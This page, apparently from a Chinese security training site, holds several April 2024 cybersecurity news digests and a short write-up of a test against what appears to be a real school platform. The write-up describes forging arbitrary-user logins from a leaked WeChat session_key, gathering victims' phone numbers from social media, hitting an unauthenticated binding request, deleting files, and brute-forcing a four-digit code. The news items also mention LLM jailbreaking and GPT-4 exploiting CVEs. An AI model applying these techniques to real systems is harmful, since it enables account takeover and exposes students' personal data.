https://www.bleepingcomputer.com/news/security/unitedhealth-confirms-it-paid-ransomware-gang-to-stop-data-leak UnitedHealth集团已确认向网络犯罪分子支付赎金,以保护在2月下旬勒索软件攻击期间被盗的敏感数据。该公司称,此次网络攻击造成了8.72亿美元的经济损失。研究人员检查了RansomHub勒索组织的数据泄露网站,可以确认攻击者已将UnitedHealth从其受害者名单中删除。该公司向患者保证,只有22张被盗文件的屏幕截图被发布在暗网上,其中一些包含个人身份信息,目前没有
5、LockBit声称从Tyler Technologies窃取数据
https://www.securityweek.com/ransomware-gang-leaks-data-allegedly-stolen-from-government-contractor LockBit勒索组织声称从政府承包商Tyler Technologies窃取了数据。该勒索组织声称拥有800Gb与DISB、美国证券交易委员会(SEC)、特拉华州银行机构和其他金融机构相关的数据,并威胁说除非支付赎金,否则将会泄露这些数据。这些数据似乎是在3月下旬从DISB的STAR系统客户端窃取的,当时该组织对公共部门的软件和服务提供商Tyler Technologies进行了网络攻击。在4
6、CoralRaider 利用 CDN 缓存传播恶意软件
https://www.freebuf.com/news/399090.html 近日,有研究人员发现,在针对美国、英国、德国和日本系统的攻击活动中,有黑客使用了网络缓存来传播恶意软件。研究人员认为,该活动的幕后黑手是 CoralRaider。该组织曾发起过多次窃取凭证、财务数据和社交媒体账户的攻击活动。此外该黑客还提供 LummaC2、Rhadamanthys 和 Cryptbot 信息窃取程序,这些信息窃取程序可在恶意软件即服务平台的地下论坛上获得,但需要支付订阅费。
7、北约举行全球规模最大的“锁定盾牌”年度网络安全演习
https://www.secrss.com/articles/65489 北约于4月22日至26日举行年度“锁定盾牌”网络安全演习,乌克兰将首次参加北约“锁定盾牌”网络演习。
8、谷歌修复了严重的 Chrome 漏洞
https://www.securityweek.com/google-patches-critical-chrome-vulnerability/ Google 修补了 CVE-2024-4058,这是一个关键的 Chrome 漏洞,研究人员因此获得了 16,000 美元的奖励。
9、思科针对“ArcaneDoor”零日攻击 ASA 防火墙平台发出警报
https://www.securityweek.com/cisco-raises-alarm-for-arcanedoor-zero-days-hitting-asa-firewall-platforms/ 思科警告称,国家支持的黑客正在利用其 ASA 防火墙平台中的至少两个零日漏洞在电信和能源部门网络上植入恶意软件。
10、美国悬赏1000万美元征集四名伊朗黑客的信息
https://securityaffairs.com/162205/cyber-warfare-2/162205us-sanctioned-4-iranian-nationals.html 美国财政部外国资产控制办公室 (OFAC) 对四名伊朗国民实施制裁,因为他们参与了针对美国的网络攻击。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年04月24日
1、APT28组织利用Windows Print Spooler漏洞进行攻击
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials 研究人员称,APT28组织利用Windows Print Spooler漏洞进行攻击活动,并使用以前未知的黑客工具GooseEgg升级权限并窃取凭据和数据。APT28组织至少从2020年6月开始,最早可能在2019年4月,一直在使用此工具利用CVE-2022-38028
2、Sandworm组织针对乌克兰20个关键基础设施进行攻击
https://cert.gov.ua/article/6278706 根据乌克兰计算机应急响应小组(CERT-UA)的一份报告,俄罗斯黑客组织Sandworm针对乌克兰20个关键基础设施进行攻击。该组织也被称为BlackEnergy、Seashell Blizzard、Voodoo Bear和APT44。CERT-UA的报告称,2024年3月,Sandworm开展了针对乌克兰10个地区能源、水和供暖供应商的信息通信系统的攻击活动。Sandworm还将先前记录的恶意软件与新的恶意工具(适用于Linux的BIASBOAT和LOADGRIP)相结合,以获得访问权限并在网络中进行横向移动。
3、Citrix UberAgent工具中存在安全漏洞
https://cybersecuritynews.com/citrix-uberagent-privilege-escalation Citrix的uberAgent是一种监控工具,用于增强Citrix平台的性能和安全性,已被确定存在安全漏洞。该漏洞被标记为CVE-2024-3902,可能允许攻击者提升权限,从而对使用受影响软件版本的组织构成重大威胁。该漏洞影响Citrix uberAgent 7.1.2之前的版本。Citrix已向所有受影响的uberAgent版本的客户发出紧急公告,要求他们立即将其软件更新到版本7.1.2或更高版本。
4、医疗实验室Synlab Italia遭受勒索软件攻击
https://www.bleepingcomputer.com/news/security/synlab-italia-suspends-operations-following-ransomware-attack Synlab Italia遭受勒索软件攻击,并已暂停其所有医疗诊断和测试服务。该公司称在4月18日凌晨发生了安全事件,这迫使其关闭了所有计算机以限制网络攻击活动。受此事件影响,所有化验分析及样本采集服务均已暂停,恢复时间将另行通知。建议客户使用电话联系Synlab,因为其电子邮件通信服务处于离线状态。该公司在最新更新的公告中称,他们已开始逐步重新启动一些服务,包括专科门诊就诊和
5、在法国请求合作后,西班牙重启对Pegasus间谍软件案的调查
https://www.securityweek.com/spain-reopens-a-probe-into-a-pegasus-spyware-case-after-a-french-request-to-work-together/ 一名西班牙法官在收到与法国类似调查合作的请求后,重新启动了对西班牙首相手机涉嫌间谍活动的调查。
6、西门子工业产品受到PaloAlto防火墙漏洞的影响
https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ Palo Alto Networks 防火墙漏洞 CVE-2024-3400 作为零日漏洞被利用,影响西门子工业产品。
7、美国政府成功举办第九次网络风暴演习
https://www.secrss.com/articles/65414 美国网络安全和基础设施安全局(CISA)宣布,第九次“网络风暴”演习(Cyber Storm IX)已于 4 月 16 -18 日成功举办,来自 100 多个组织超过 2000 名参与者参与实时演练。
8、BlackTech 瞄准亚太的科技、研究和政府部门
https://thehackernews.com/2024/04/blacktech-targets-tech-research-and-gov.html 作为最近网络攻击浪潮的一部分,亚太地区的技术、研究和政府部门已成为一个名为 BlackTech 的威胁攻击者的目标。
9、大语言模型存在多轮越狱漏洞,多个AI模型无一幸免
https://www.freebuf.com/articles/paper/398416.html 人工智能初创公司Anthropic于2024年04月03日发表的一篇针对人工智能安全的论文,该公司在本论文中宣布的一种新的“越狱”技术,名为Many-shot Jailbreaking(多轮越狱)。文章详细描述了目前大语言模型(LLM)中存在的一种安全漏洞,这种技术可以用来规避LLM开发人员所设置的安全护栏,而该漏洞可能会被威胁行为者利用并诱使AI模型提供原本被程序设定规避的回复。
10、报告称Microsoft 和谷歌是网络诈骗中被模仿最多的品牌
http://www.anquan419.com/knews/24/6806.html 根据 Check Point 的一份报告,Microsoft 和 Google 是 2024 年第一季度网络钓鱼攻击中最常被冒充的品牌。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年04月23日
1、Octapharma Plasma遭受BlackSuit勒索软件攻击
https://www.theregister.com/2024/04/18/ransomware_octapharma_plasma 由于遭受网络攻击,Octapharma Plasma在美国各地的150多个中心的网络系统持续关闭。一位知情人士表示,Octapharma Plasma遭受的是BlackSuit勒索软件攻击,攻击者通过入侵该公司的VMware系统投放该勒索软件。BlackSuit是一种相对较新的勒索软件,它与Royal共享代码,甚至可能是该勒索组织的重塑。
2、Mobile Guardian发生数据泄露事件
https://www.straitstimes.com/singapore/app-managing-students-personal-learning-devices-at-127-schools-hacked-names-e-mail-addresses-leaked-moe 新加坡教育部在其网站上的一份声明中表示,Mobile Guardian的用户管理门户在其总部因未经授权的访问事件而受到损害,这导致新加坡5所小学和122所中学的家长和教师的姓名及电子邮件地址泄露。这意味着新加坡大约三分之一的中小学受到这次事件的影响。泄露的信息包括父母的名字和姓氏,他们的电子邮件地址,学生就读的
3、纽约州立法机构遭受网络攻击
https://uk.news.yahoo.com/cyberattack-hits-ny-capitol-amid-012534971.html 纽约州立法机构的计算机基础设施遭到了网络攻击,该事件减缓了已经逾期数周的州预算谈判的进展,并迫使该州转向使用20世纪的备份系统。为了应对此次事件,法案起草办公室使用1994年过时的计算机归档系统,该系统在20多年前被替换。此次事件的确切原因或动机尚不清楚。
4、攻击者声称窃取World-Check数据库中的数据
https://www.databreachtoday.com/hacker-threatens-to-expose-sensitive-world-check-database-a-24909 攻击者声称窃取了伦敦证券交易所维护的关键数据库World-Check中的数据。World-Check是银行和其他机构用来打击金融犯罪数据库。名称为“GhostR”的攻击者表示窃取了该数据库中的530万条记录,并很快将公开其中的一部分。攻击者称其通过一家具有World-Check访问权限的新加坡公司访问了该数据库,该公司有一个持续集成服务器,默认情况下具有管理访问权限。伦敦证券交易所集团向证实了第三方
5、研究人员在Chirp Systems的应用中发现安全漏洞
https://www.securitylab.ru/news/547516.php 研究人员在由Chirp Systems软件控制的智能锁中发现安全漏洞。攻击者可以利用该漏洞进行远程解锁。该漏洞是由于Chirp安卓应用程序中具有硬编码的密码和私钥,这些数据可用于访问智能锁的API,从而对智能锁进行远程管理。目前该漏洞已经被标识为CVE-2024-2197,CVSS评分为9.1/10。美国网络安全和基础设施保护局(CISA)也就该漏洞发出警告,指出Chirp尚未采取必要措施来解决该漏洞。
6、Akira 勒索软件肆虐,250 多家机构惨遭毒手
https://www.freebuf.com/news/398648.html 据美国联邦调查局(FBI)和其他当局称,在不到一年的时间里,以多重勒索策略著称的 "Akira "勒索软件团伙已从250多个受影响的组织中获得了约 4200 万美元的勒索软件收益。
7、GPT-4 会自己发起漏洞攻击,成功率高达87%
https://www.freebuf.com/news/398651.html 近日,伊利诺伊大学香槟分校的研究团队揭示了一项关于人工智能模型进行黑客攻击的新研究:只需要阅读CVE漏洞描述,GPT-4就可以瞬间化身黑客,成功实施漏洞攻击,综合成功率达到了惊人的87%。
8、Quishing 网络钓鱼攻击猛增十倍,附件有效载荷减半
https://www.infosecurity-magazine.com/news/quishing-attacks-tenfold/ Egress发布的报告显示,冒充攻击仍然普遍存在,其中77%冒充知名品牌,尤其是DocuSign和Microsoft。社会工程学策略有所加强,占网络钓鱼攻击的 16.8%,而网络钓鱼电子邮件的长度自 2021 年以来增长了三倍,这可能归因于生成式人工智能的使用。
9、《严阵以待》遭黑客攻击,数据库被洗劫一空
https://news.zol.com.cn/866/8665548.html 据了解,这次数据泄露事件的主要内容包括《严阵以待》游戏的所有源代码,其中涉及到该游戏在PlayStation 4测试工具上运行的图片以及构建数据,还有Xbox One、Xbox Series X|S和PlayStation 5上的构建数据。
10、OfflRouter 恶意软件在乌克兰躲避检测近十年
https://www.anquanke.com/post/id/295771 OfflRouter 的作案手法几乎保持不变,VBA 宏嵌入的 Microsoft Word 文档会删除名为“ctrlpanel.exe”的 .NET 可执行文件,然后该文件会感染系统和其他设备上发现的具有 .DOC(而非 .DOCX)扩展名的所有文件。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
一次奇妙的任意用户登录实战
刚刚进行了微信sessionkey的学习,正准备实战一下,就发现了这个神奇的网站,预知后事如何。请继续向下看去
1. 目标
2. 开局一个登录框
3. 首先,直接弱口令走起来,万一留有测试的账号呢
尝试,1311111111,13333333333.13888888888,未果
测试多了还有验证码防止爆破,也就不再继续尝试爆破了
弱口令g
4. 点击微信快捷登录,发现sessionkey(步入正题)
点击允许,数据包发现sessionkey参数
找到我们github上找到的sessionkey利用插件,把session_key(加密解密的key)encrypt_data(向数据库提交的值)iv(偏移量)的值都复制到工具上进行利用
但是怎么找到这个系统用户的手机号呢(万能的贴吧,抖音等地方获得了老师的手机号)
成功登录,任意用户登录加1
5. 发现这个接收了sessionkey的加密数据后,还会发送一个绑定手机号的数据包(又一个任意用户登录)
修改请求包的user参数,发现没有鉴权,直接输入用户手机号即可绑定登录
感觉离谱,任意用户登录又加1
6.输入名字即可查看学生学籍信息(编码解码后名字为张杰)
敏感信息泄露加1
7. 维修处可以上传图片,尝试利用
准备试试绕过,结果白名单加黑名单过滤,文件上传gg
但是删除文件发现是直接DELETE请求,还是直接删路径,只能说开发太牛了,真的离谱
测试不同用户文件可以直接删除,没有进一步尝试(害怕系统崩溃),任意文件删除加1
8. 发现这个还有一个预约平台,鉴于上个系统的离谱,继续尝试利用(非原图,原图特征太明显了)
进入后发现只有验证码登录
尝试爆破四位数验证码
成功登录,任意用户登录又加1
总结:
第一次碰见这么多的任意用户登录,建议加强鉴权,隐藏sessionkey值,登录设置次数要求,防止爆破。另外,进行漏洞挖掘,建议证明即可,未经客户允许禁止扩大危害,盲目扩大危害可能有法律风险。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

